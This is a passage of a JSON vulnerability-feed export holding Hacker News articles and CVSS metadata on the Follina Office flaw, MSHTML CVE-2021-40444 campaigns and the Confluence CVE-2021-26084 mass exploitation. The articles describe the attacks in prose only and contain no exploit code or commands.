"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-18T03:08:00", "type": "thn", "title": "Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-10-25T03:24:38", "id": "THN:DEAEC76D89D5583101E2E6036C289609", "href": "https://thehackernews.com/2022/08/apple-releases-security-updates-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the 